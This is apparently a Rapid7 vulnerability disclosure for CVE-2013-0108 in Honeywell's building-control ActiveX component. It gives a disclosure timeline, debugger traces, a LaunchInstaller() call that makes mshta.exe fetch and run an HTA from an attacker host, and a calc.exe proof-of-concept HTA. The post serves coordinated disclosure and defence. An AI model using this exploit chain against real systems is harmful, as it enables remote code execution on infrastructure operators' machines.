Today, we present to you a new vulnerability, CVE-2013-0108, discovered in Honeywell Enterprise Buildings Integrator (EBI) R310 - R410.2. This platform is used to integrate different systems and devices such as heating, ventilation, and air conditioning (HVAC) controls; security; access control; life safety; lighting; energy management; and facilities management into a common platform. Using open architecture and industry standards, EBI integrates existing buildings systems, providing seamless digital information and control across all building operational management systems." Following our standard disclosure policy, we notified both Honeywell and CERT/CC, who in turn coordinated with ICS-CERT. Quoting from the ICS-CERT advisory ICSA-13-053-02:

Exploitation of this vulnerability could allow partial loss of availability, integrity, and confidentiality and could be exploited remotely. This vulnerability could affect systems deployed in the government facilities and commercial facilities sectors.

The vulnerability could allow remote attackers to execute arbitrary code via a specially crafted HTML document. The attacker would require an end-user or operator to voluntarily interact with the attack mechanism for it to be successful. For example, the attacker could send an email message to the end-user, containing a link to a Web site with the specially crafted HTML document. CVE-2013-0108 has been assigned to this vulnerability with a CVSS v2 base score of 6.8.

Now, before you read any further, if you own or operate one of these building control systems, you really should take a few moments and spend quality time with your Honeywell sales and service representative to ask about getting the latest Station Security Update Package. When we first reported this to Honeywell, their responsiveness and concern was both prompt and thorough, so it's clear to all of us at Rapid7 that Honeywell definitely has their customers' security interests at heart. From a disclosure standpoint, Honeywell's response was A , would exploit again. (:

Vulnerability Summary

The specific flaw exists within the HSC Remote Deploy ActiveX (HSCRemoteDeploy.dll), with the class ID "0D080D7D-28D2-4F86-BFA1-D582E5CE4867". This control is used to support installation of Honeywell HMIWeb Browser on workstation clients. The LaunchInstaller() method, provided by the vulnerable control, can be abused to run an arbitrary HTA application through mshta.exe.

Disclosure Timeline

Date****Description2013-01-08Initial discovery by Juan Vazquez, Metasploit Researcher2013-01-08Metasploit module written2013-01-10Initial disclosure to the vendor, Honeywell2013-01-10Initial response from the vendor2013-01-25Disclosure to CERT/CC2013-01-30Disclosure coordination with vendor, CERT/CC, and ISC-CERT2013-02-04Vendor advisory bulletin and patch drafted2013-02-22Vendor advisory bulletin and patch release2013-02-22ISC-CERT Advisory published2013-03-11Public disclosure and Metasploit modules published2013-03-12Kill bits released on Microsoft Patch Tuesday (proposed)2013-03-14ISC-CERT Advisory updated

Technical Analysis

A remote page can make the Internet Explorer load the vulnerable ActiveX control by using its class ID:

The vulnerable ActiveX control will be loaded by Internet Explorer:

0:006> g ModLoad: 020b0000 020e7000
C:\WINDOWS\system32\HSCRemoteDeploy.dll
eax=00000003
ebx=00000000
ecx=020de070
edx=f20b0000
esi=00255ba8
edi=00000000
eip=7c90e4f4
esp=00137dc0
ebp=00137eb4
iopl=0
nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246 ntdll!KiFastSystemCallRet: 7c90e4f4 c3              ret 0:000> lmv m HSCRemoteDeploy
start
end 
module name 020b0000 020e7000
HSCRemoteDeploy
(deferred)
Image path: C:\WINDOWS\system32\HSCRemoteDeploy.dll
Image name: HSCRemoteDeploy.dll 
Timestamp: 
Wed Sep 29 13:51:06 2010 (4CA3282A)
CheckSum:         0003DCC8
ImageSize:        00037000
File version:     5.7.165.119
Product version:  5.7.165.119
File flags:       0 (Mask 3F)
File OS:          4 Unknown Win32
File type:        2.0 Dll
File date:        00000000.00000000 
Translations:     0409.04b0 
CompanyName:      Honeywell Limited
ProductName:      HMIWeb
FileVersion:      5, 7, 165, 119 
PrivateBuild:     Official build
FileDescription:  Unicode Release Build
LegalCopyright:   Copyright 2008 Honeywell International Sàrl     LegalTrademarks:  Copyright 2008 Honeywell International Sàrl

Once loaded, the LaunchInstaller() method can be used to execute an arbitrary remote HTA application by specifying an arbitrary URI as "bstrParameter" parameter. The prototype for this method is described here:

Sub LaunchInstaller (
ByVal bstrServer  As String , 
ByVal bstrRedirect  As String , 
ByVal bUpgrade  As Boolean )

It can be abused in code such as:

RemoteInstaller.LaunchInstaller("http://192.168.1.128:8080", "", false);

The above LaunchInstaller() call will translate to the next execution of ShellExecuteExW, with a pointer to the SHELLEXECUTEINFO structure stored in 0013e200 as argument:

0:000> bp
HSCRemoteDeploy
866A 0:000> g Breakpoint
0 hit eax=020d2644
ebx=0210246c
ecx=021023e8
edx=0013e200
esi=00000000
edi=0013e26c
eip=020b866a
esp=0013e1ec
ebp=0013e254
iopl=0
nv up ei pl zr na pe nc cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000
efl=00000246 HSCRemoteDeploy!DllUnregisterServer
0x2e4a: 020b866a
ff10
call
dword ptr [eax]
ds:0023:020d2644=d68d0b02
0:000> t
eax=020d2644
ebx=0210246c
ecx=021023e8
edx=0013e200
esi=00000000
edi=0013e26c
eip=020b8dd6
esp=0013e1e8
ebp=0013e254
iopl=0
nv up ei pl zr na pe nc cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246 HSCRemoteDeploy!DllUnregisterServer
0x35b6: 020b8dd6 ff253c120d02
jmp
dword ptr [HSCRemoteDeploy!DllUnregisterServer 0x1ba1c (020d123c)] ds:0023:020d123c={
SHELL32!ShellExecuteExW (7ca02f03)
}
0:000> dd esp L2 0013e1e8  020b866c 0013e200

The SHELLEXECUTEINFO used as parameter contains the next values:

Field****ValuelpVerbopenlpFileC:\WINDOWS\system32\mshta.exelpParametershttp://192.168.1.128:8080/System/Displays/RemoteInstallWelcome.hta

0:000> du poi(0013e200 C) 021040ac
"open" 0:000> du poi(0013e200 10) 0210246c
"C:\WINDOWS\system32\mshta.exe" 0:000> du poi(0013e200 14)02104014
"http : //192.168.1.128:8080/System" 02104054
"Displays/RemoteInstallWelcome.ht" 02104094  "a"

The location of the HTA application to be opened via mshta.exe can be influenced by the "bstrServer" parameter, which leads to remote HTA code execution.

Exploitation

Since arbitrary HTA application execution is possible, according to the MSDN article Introduction to HTML Applications (HTAs), arbitrary code execution will be possible:

As fully trusted applications, HTAs carry out actions that Internet Explorer would never permit in a webpage. The result is an application that runs seamlessly, without interruption.

In HTAs, the restrictions against allowing script to manipulate the client machine are lifted. For example, all command codes are supported without scripting limitations (see command id). And HTAs have read/write access to the files and system registry on the client machine.

The trusted status of HTAs also extends to all operations subject to security zone options. In short, zone security is off. Consequently, HTAs run embedded Microsoft ActiveX controls and Java applets irrespective of the zone security setting on the client machine. No warning displays before such objects are run within an HTA. HTAs run outside of the Internet Explorer process, and therefore are not subject to the security restrictions imposed by Protected Mode when run on Windows Vista.

As a simple proof of concept, the next HTA application can be used to launch calc.exe:

a=new ActiveXObject("WScript.Shell"); a.run('%windir%\\\\System32\\\\calc.exe'); window.close(); 

In order to achieve remote code execution a Metasploit module has been developed. The module has been tested successfully on Windows XP and Windows 7 operating systems with Internet Explorer 6 to Internet Explorer 9:

Want to try this out for yourself? Get your free Metasploit download now or update your existing installation, and let us know if you have any further questions.